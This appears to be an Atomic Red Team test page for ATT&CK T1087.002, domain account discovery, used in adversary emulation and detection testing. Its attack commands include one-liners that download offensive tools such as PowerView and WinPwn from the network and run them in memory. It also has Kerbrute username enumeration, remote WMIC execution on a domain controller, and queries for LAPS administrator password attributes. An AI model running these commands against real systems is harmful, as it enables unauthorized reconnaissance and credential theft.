T1087.002 - Domain Account#
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. PowerShell cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.
Atomic Tests#
Atomic Test #1 - Enumerate all accounts (Domain)Enumerate all accounts#
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Supported Platforms: windows#### Attack Commands: Run with command_prompt
net user /domain
net group /domain
Invoke-AtomicTest T1087.002 -TestNumbers 1
Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.#
Supported Platforms: windows#### Attack Commands: Run with powershell
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
Invoke-AtomicTest T1087.002 -TestNumbers 2
Atomic Test #3 - Enumerate logged on users via CMD (Domain)Enumerate logged on users. Upon exeuction, logged on users will be displayed.#
Supported Platforms: windows#### Attack Commands: Run with command_prompt
query user /SERVER:%COMPUTERNAME%
Invoke-AtomicTest T1087.002 -TestNumbers 3
Atomic Test #4 - Automated AD Recon (ADRecon)#
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Supported Platforms: windows
Dependencies: Run with powershell!#
Description: ADRecon must exist on disk at specified location (#{adrecon_path})#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1"
Invoke-AtomicTest T1087.002 -TestNumbers 4 -GetPreReqs
Attack Commands: Run with powershell#
Invoke-Expression "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1"
Invoke-AtomicTest T1087.002 -TestNumbers 4
Cleanup:#
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
Invoke-AtomicTest T1087.002 -TestNumbers 4 -Cleanup
Atomic Test #5 - Adfind -Listing password policy#
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
Supported Platforms: windows
Dependencies: Run with powershell!#
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Invoke-AtomicTest T1087.002 -TestNumbers 5 -GetPreReqs
Attack Commands: Run with command_prompt#
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-AtomicTest T1087.002 -TestNumbers 5
Atomic Test #6 - Adfind - Enumerate Active Directory Admins#
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
Supported Platforms: windows
Dependencies: Run with powershell!#
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Invoke-AtomicTest T1087.002 -TestNumbers 6 -GetPreReqs
Attack Commands: Run with command_prompt#
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp
Invoke-AtomicTest T1087.002 -TestNumbers 6
Atomic Test #7 - Adfind - Enumerate Active Directory User Objects#
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: windows
Dependencies: Run with powershell!#
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Invoke-AtomicTest T1087.002 -TestNumbers 7 -GetPreReqs
Attack Commands: Run with command_prompt#
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person)
Invoke-AtomicTest T1087.002 -TestNumbers 7
Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects#
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: windows
Dependencies: Run with powershell!#
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Invoke-AtomicTest T1087.002 -TestNumbers 8 -GetPreReqs
Attack Commands: Run with command_prompt#
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses
Invoke-AtomicTest T1087.002 -TestNumbers 8
Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)This test will enumerate the details of the built-in domain admin account#
Supported Platforms: windows#### Attack Commands: Run with command_prompt
net user administrator /domain
Invoke-AtomicTest T1087.002 -TestNumbers 9
Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation#
Attackers may attempt to query for computer objects with the UserAccountControl property ‘TRUSTED_FOR_DELEGATION’ (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Supported Platforms: windows
Elevation Required (e.g. root or admin)
Dependencies: Run with powershell!#
Description: PowerShell ActiveDirectory Module must be installed#
Check Prereq Commands:#
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
Get Prereq Commands:#
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
Invoke-AtomicTest T1087.002 -TestNumbers 10 -GetPreReqs
Attack Commands: Run with powershell#
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=524288)' -Server $env:UserDnsDomain
Invoke-AtomicTest T1087.002 -TestNumbers 10
Atomic Test #11 - Get-DomainUser with PowerViewUtilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.#
Supported Platforms: windows#### Attack Commands: Run with powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
Invoke-AtomicTest T1087.002 -TestNumbers 11
Atomic Test #12 - Enumerate Active Directory Users with ADSISearcherThe following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.#
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Invoke-AtomicTest T1087.002 -TestNumbers 12
Atomic Test #13 - Enumerate Linked Policies In ADSISearcher DiscoveryThe following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.#
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Invoke-AtomicTest T1087.002 -TestNumbers 13
Atomic Test #14 - Enumerate Root Domain linked policies DiscoveryThe following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.#
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Invoke-AtomicTest T1087.002 -TestNumbers 14
Atomic Test #15 - WinPwn - generaldomaininfoGathers general domain information using the generaldomaininfo function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput```
Invoke-AtomicTest T1087.002 -TestNumbers 15
Atomic Test #16 - Kerbrute - userenum#
Enumerates active directory usernames using the userenum function of Kerbrute Supported Platforms: windows
Dependencies: Run with powershell!#
Description: kerbrute.exe must exist in PathToAtomicsFolder..\ExternalPayloads.#
Check Prereq Commands:#
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
Description: username text file must exist in PathToAtomicsFolder..\ExternalPayloads.#
Check Prereq Commands:#
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Invoke-AtomicTest T1087.002 -TestNumbers 16 -GetPreReqs
Attack Commands: Run with powershell#
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d $env:USERDOMAIN --dc $env:UserDnsDomain "PathToAtomicsFolder\..\ExternalPayloads\username.txt"```
Invoke-AtomicTest T1087.002 -TestNumbers 16
Atomic Test #17 - Wevtutil - Discover NTLM Users RemoteThis test discovers users who have authenticated against a Domain Controller via NTLM.#
This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. Reference
Supported Platforms: windows#### Attack Commands: Run with powershell
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'```
Invoke-AtomicTest T1087.002 -TestNumbers 17
Cleanup:#
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
Invoke-AtomicTest T1087.002 -TestNumbers 17 -Cleanup
Atomic Test #18 - Suspicious LAPS Attributes Query with Get-ADComputer all propertiesThis test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTimeSupported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Get-ADComputer $env:computername -Properties *```
Invoke-AtomicTest T1087.002 -TestNumbers 18
Atomic Test #19 - Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd propertyThis test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTimeSupported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Get-ADComputer $env:computername -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime```
Invoke-AtomicTest T1087.002 -TestNumbers 19
Atomic Test #20 - Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScopeThis test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTimeSupported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *```
Invoke-AtomicTest T1087.002 -TestNumbers 20
Atomic Test #21 - Suspicious LAPS Attributes Query with adfind all propertiesThis test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTimeSupported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h $env:USERDOMAIN -s subtree -f "objectclass=computer" *
Invoke-AtomicTest T1087.002 -TestNumbers 21
Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwdThis test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTimeSupported Platforms: windows#
Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h $env:USERDOMAIN -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
Invoke-AtomicTest T1087.002 -TestNumbers 22
Atomic Test #23 - Active Directory Domain Search#
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Supported Platforms: linux
Elevation Required (e.g. root or admin)
Dependencies: Run with sh!#
Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch#
Check Prereq Commands:#
which ldapsearch
Get Prereq Commands:#
echo ldapsearch not found
Invoke-AtomicTest T1087.002 -TestNumbers 23 -GetPreReqs
Attack Commands: Run with sh#
ldapsearch -H ldap://example.test:389 -x -D user@example.test -w s3CurePssw0rD! -b "CN=Users,DC=example,DC=test" -s sub -a always -z 1000 dn
Invoke-AtomicTest T1087.002 -TestNumbers 23
Atomic Test #24 - Account Enumeration with LDAPDomainDump#
This test uses LDAPDomainDump to perform account enumeration on a domain. Reference
Supported Platforms: linux
Elevation Required (e.g. root or admin)
Dependencies: Run with sh!#
Description: Python3 must be installed#
Check Prereq Commands:#
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
sudo apt-get -y install python3
Description: Pip must be installed#
Check Prereq Commands:#
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:#
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
Description: The ldapdomaindump module must be installed#
Check Prereq Commands:#
python3 -c 'import ldapdomaindump' 2>/dev/null
Get Prereq Commands:#
pip install ldapdomaindump
Description: The future module must be installed#
Check Prereq Commands:#
python3 -c 'import future' 2>/dev/null
Get Prereq Commands:#
pip install future
Invoke-AtomicTest T1087.002 -TestNumbers 24 -GetPreReqs
Attack Commands: Run with sh#
ldapdomaindump -u domain\user -p password 127.0.0.1 -o /tmp/T1087```
Invoke-AtomicTest T1087.002 -TestNumbers 24
Cleanup:#
rm -rf /tmp/T1087/ 2>/dev/null
Invoke-AtomicTest T1087.002 -TestNumbers 24 -Cleanup
Detection#
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.